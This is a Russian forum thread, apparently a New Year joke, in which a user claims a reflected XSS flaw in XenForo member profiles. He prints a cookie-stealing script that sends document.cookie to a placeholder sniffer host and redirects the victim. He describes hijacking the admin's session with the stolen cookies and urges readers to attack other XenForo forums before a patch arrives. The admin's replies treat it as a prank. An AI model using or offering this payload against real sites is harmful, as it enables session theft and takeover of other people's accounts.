Информация Предновогодний XSS


Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Решил я перед НГ порыться на нашем форуме в поисках xss-уязвимости...И наткнулся на интересную вещь
Выяснилось странная закономерность-страница профиля тринадцатого мембера любого ксенфоровского форума содержит пассивную xss.В видео для демонстрации был использован простенький скрипт с алертом
Код:
<script>alert('Предновогодний XSS!')</script>
Но это ведь неинтересно и я решил пойти дальше и захватить кресло верховного главнокомандующего.Вместо скрипта выше вставил боевой скрипт который отсылает куки жертвы на мой сниффер и редиректит бедолагу на другую страничку,дабы тот не прочухал что-то неладное.
Код:
<script> img  = new Image(); img.src = "http://мой сниффер/s.gif?"+document.cookie;
location.href ="http://какая-нибудь страничка на этом форуме/" </script>
Так как я знал,что X-Shar не ждёт от меня подлости,то не стал заморачиваться с маскировкой,а просто отправил ему линк со скриптом в .
После перехода в админке сниффера можно увидеть следующее (на мне в качестве примера):
xss1.png

Ну и осталось лишь воспользоваться добытыми куками ...
xss2.png

В честь НГ и нового владельца ресурса все ключники будут реабилитированы и их темы восстановлены.Олег наверное уйдёт на покой,ну или останется здесь управлять серверными делами.
С наступающим Новым годом!Гоу ломать ксенфорумы,пока дыру не прикрыли.
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 082
Репутация
8 199
С наступающим Новым годом!Гоу ломать ксенфорумы,пока дыру не прикрыли.
sholoh itsholoh itsholoh itsholoh itsholoh itsholoh itsholoh itsholoh it

Отписал разработчикам...

Не хилая такая дыра...NO-no!!!NO-no!!!NO-no!!!

Теперь не буду по ссылкам переходить и картинки в браузере отключу !sholoh itsholoh itsholoh itsholoh it
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 082
Репутация
8 199
Ну и как, кто-то искал этого 13-го пользователя ?Dmeh-Smeh-Smeh!!!

Я всю Новогоднюю ночь проискал эту уязвимость здесь и этого неуловимого триннадцатого пользователя, спасибо Антоха, удружил...sholoh itsholoh itsholoh it
 
Верх Низ